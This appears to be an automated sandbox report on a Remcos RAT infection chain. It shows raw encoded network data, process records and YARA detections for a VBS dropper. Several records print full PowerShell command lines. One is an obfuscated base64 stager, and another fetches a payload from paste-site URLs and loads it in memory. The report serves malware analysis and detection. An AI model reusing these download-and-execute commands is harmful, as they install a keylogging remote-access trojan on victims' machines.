                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 54 32 51 6b 4e 38 59 44 4e 32 77 69 4e 6b 59 44 48 32 51 68 4e 4d 59 44 42 31 77 66 4e 30 58 44 37 31 51 65 4e 63 58 44 31 31 77 63 4e 45 58 44 76 31 51 62 4e 73 57 44 70 31 77 5a 4e 55 57 44 6a 31 51 59 4e 38 56 44 64 31 77 57 4e 6b 56 44 42 30 77 50 4e 30 54 44 37 30 51 4f 4e 63 54 44 31 30 77 4d 4e 45 54 44 76 30 51 4c 4e 73 53 44 70 30 77 4a 4e 55 53 44 6a 30 51 49 4e 38 52 44 64 30 77 47 4e 6b 52 44 58 30 51 46 4e 4d 52 44 52 30 77 44 4e 30 51 44 4c 30 51 79 4d 49 4e 44 50 7a 41 7a 4d 6b 4d 44 47 7a 77 77 4d 41 49 44 39 79 67 75 4d 63 4c 44 30 79 51 73 4d 34 4b 44 72 79 41 71 4d 55 4b 44 69 79 77 6e 4d 77 4a 44 5a 79 67 6c 4d 4d 4a 44 51 79 41 6a 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47
                                                                                              Data Ascii: T2QkN8YDN2wiNkYDH2QhNMYDB1wfN0XD71QeNcXD11wcNEXDv1QbNsWDp1wZNUWDj1QYN8VDd1wWNkVDB0wPN0TD70QONcTD10wMNETDv0QLNsSDp0wJNUSDj0QIN8RDd0wGNkRDX0QFNMRDR0wDN0QDL0QyMINDPzAzMkMDGzwwMAID9yguMcLD0yQsM4KDryAqMUKDiywnMwJDZyglMMJDQyAjMkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUG
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44
                                                                                              Data Ascii: zA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBD
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 67 34 4e 45 65 44 67 33 77 33 4e 34 64 44 64 33 41 33 4e 73 64 44 61 33 51 32 4e 67 64 44 58 33 67 31 4e 55 64 44 55 33 77 30 4e 49 64 44 52 33 41 30 4e 38 63 44 4f 33 51 7a 4e 77 63 44 4c 33 67 79 4e 6b 63 44 43 33 51 77 4e 41 59 44 37 32 67 75 4e 6b 62 44 34 32 77 74 4e 59 62 44 31 32 41 74 4e 45 5a 44 51 32 77 6a 4e 6f 59 44 4a 32 41 69 4e 63 59 44 47 32 51 68 4e 51 59 44 44 32 41 51 4e 38 58 44 2b 31 51 66 4e 77 58 44 37 31 67 65 4e 6b 58 44 34 31 77 64 4e 59 58 44 31 31 41 64 4e 4d 58 44 79 31 51 63 4e 41 58 44 76 31 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 70 31 41 61 4e 63 57 44 6d 31 51 5a 4e 51 57 44 6a 31 67 59 4e 45 57 44 67 31 77 58 4e 34 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52
                                                                                              Data Ascii: g4NEeDg3w3N4dDd3A3NsdDa3Q2NgdDX3g1NUdDU3w0NIdDR3A0N8cDO3QzNwcDL3gyNkcDC3QwNAYD72guNkbD42wtNYbD12AtNEZDQ2wjNoYDJ2AiNcYDG2QhNQYDD2AQN8XD+1QfNwXD71geNkXD41wdNYXD11AdNMXDy1QcNAXDv1gbN0WDs1waNoWDp1AaNcWDm1QZNQWDj1gYNEWDg1wXN4VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR
                                                                                              2024-10-31 06:41:19 UTC1279INData Raw: 4f 4e 75 53 44 6d 30 59 47 4e 61 52 7a 4b 30 34 78 4d 67 50 7a 76 7a 55 37 4d 69 4f 44 65 7a 38 32 4d 6f 4e 6a 4a 7a 38 68 4d 6c 4c 7a 7a 79 67 72 4d 78 4b 44 69 79 41 6f 4d 6a 4a 54 56 79 59 6b 4d 47 45 44 37 41 41 41 41 34 42 51 42 41 41 41 41 41 38 44 31 2f 59 36 50 35 39 7a 5a 2f 38 30 50 47 35 54 79 2b 49 51 50 72 33 6a 33 39 45 64 50 45 33 7a 67 39 59 58 50 76 31 44 61 39 45 47 50 6b 7a 54 32 38 73 4c 50 55 79 6a 63 38 63 45 50 54 73 7a 37 37 41 2b 4f 57 76 7a 7a 36 49 76 4f 65 69 44 2b 34 49 35 4e 55 66 6a 78 33 4d 37 4e 72 65 54 6e 33 59 31 4e 4a 64 54 4e 33 4d 69 4e 37 61 54 57 31 41 61 4e 59 57 6a 69 31 6b 58 4e 73 56 54 59 31 45 53 4e 4d 51 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a
                                                                                              Data Ascii: ONuSDm0YGNaRzK04xMgPzvzU7MiODez82MoNjJz8hMlLzzygrMxKDiyAoMjJTVyYkMGED7AAAA4BQBAAAAA8D1/Y6P59zZ/80PG5Ty+IQPr3j39EdPE3zg9YXPv1Da9EGPkzT28sLPUyjc8cEPTsz77A+OWvzz6IvOeiD+4I5NUfjx3M7NreTn3Y1NJdTN3MiN7aTW1AaNYWji1kXNsVTY1ESNMQD+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 32 30 30 30 0d 0a 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75
                                                                                              Data Ascii: 2000axAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 71 4e 69 55 44 32 31 4d 63 4e 70 56 6a 46 30 6b 77 4d 72 4d 44 43 79 67 64 4d 48 44 41 41 41 77 45 41 45 41 43 41 37 4d 47 4f 56 63 44 2b 33 59 36 4e 41 5a 44 4b 31 73 57 4e 79 55 44 44 30 41 39 4d 7a 50 54 41 79 41 74 4d 79 45 54 37 78 6f 62 4d 6f 46 7a 4f 78 34 41 4d 63 42 41 41 41 41 44 41 45 41 42 41 41 41 77 50 6e 2b 7a 64 2b 6b 53 50 69 33 7a 68 39 6b 33 4f 42 70 54 64 35 6b 45 4f 35 69 7a 6b 34 59 33 4e 45 61 6a 6e 32 63 6a 4e 6b 55 54 38 31 45 38 4d 6e 49 6a 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f
                                                                                              Data Ascii: qNiUD21McNpVjF0kwMrMDCygdMHDAAAwEAEACA7MGOVcD+3Y6NAZDK1sWNyUDD0A9MzPTAyAtMyET7xobMoFzOx4AMcBAAAADAEABAAAwPn+zd+kSPi3zh9k3OBpTd5kEO5izk4Y3NEajn2cjNkUT81E8MnIj5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 4d 48 44 54 77 77 77 4c 4d 32 43 44 73 77 6f 4b 4d 6c 43 7a 6e 77 6b 4a 4d 54 43 6a 6a 77 67 49 4d 43 43 44 66 77 63 48 4d 78 42 7a 61 77 55 47 4d 67 42 6a 57 77 4d 46 4d 4f 42 54 53 77 4d 45 4d 39 41 7a 4e 77 49 44 4d 73 41 6a 4a 77 41 43 4d 62 41 54 46 77 38 41 4d 4a 41 44 42 41 41 51 41 49 42 77 41 67 42 41 41 41 38 6a 2f 2f 67 2f 50 79 2f 54 37 2f 63 2b 50 68 2f 7a 32 2f 59 39 50 51 2f 6a 79 2f 51 38 50 2f 2b 54 75 2f 4d 37 50 74 2b 44 71 2f 49 36 50 63 2b 6a 6c 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45
                                                                                              Data Ascii: MHDTwwwLM2CDswoKMlCznwkJMTCjjwgIMCCDfwcHMxBzawUGMgBjWwMFMOBTSwMEM9AzNwIDMsAjJwACMbATFw8AMJADBAAQAIBwAgBAAA8j//g/Py/T7/c+Ph/z2/Y9PQ/jy/Q8P/+Tu/M7Pt+Dq/I6Pc+jl/E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8E


                                                                                              Target ID:0
                                                                                              Start time:02:41:00
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                                                                                              Imagebase:0x7ff697930000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:02:41:01
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?
Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:02:41:01
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:02:41:03
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:02:41:05
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c
                                                                                              Imagebase:0x7ff684400000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:02:41:05
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                              Imagebase:0x7ff7cad00000
                                                                                              File size:22'528 bytes
                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:02:41:09
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:02:41:21
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                              Imagebase:0xa90000
                                                                                              File size:43'008 bytes
                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1976974174.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction ID: 6eb40f59b6a87f2098dbe40235456c039b9dca3bb15d5331fb810070f58f72af
                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction Fuzzy Hash: B601A77021CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Q5$(7Q5
                                                                                                • API String ID: 0-3205885250
                                                                                                • Opcode ID: 24b98ccb1cb8b9f52d384efc9a72908c6df17fee07dbf2341fc57e87172f76ab
                                                                                                • Instruction ID: 07aee74b265fe62854f4651ab633a8db52f4aaebfa8e44d20cc4131916028a06
                                                                                                • Opcode Fuzzy Hash: 24b98ccb1cb8b9f52d384efc9a72908c6df17fee07dbf2341fc57e87172f76ab
                                                                                                • Instruction Fuzzy Hash: 8DC24931B0EB8D0FE7A69BA858655B57FE2EF66310B0901FBD04DC71A3DA58AD06C341
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x8Q5
                                                                                                • API String ID: 0-1352944497
                                                                                                • Opcode ID: 6fdfac4ac2ef46edf04f72f4e782fdfb2614f9b11657bf441f54f9ff1cfcf481
                                                                                                • Instruction ID: b3b2980b300f3d4eef5756dd9cbfaebae9781875439b35b8283453b7ba41c6c8
                                                                                                • Opcode Fuzzy Hash: 6fdfac4ac2ef46edf04f72f4e782fdfb2614f9b11657bf441f54f9ff1cfcf481
                                                                                                • Instruction Fuzzy Hash: 2D419770A1995D8FDBA5EB28C8A4BE8B7F1EF59301F5000EA944DE3291DB356EC18F00
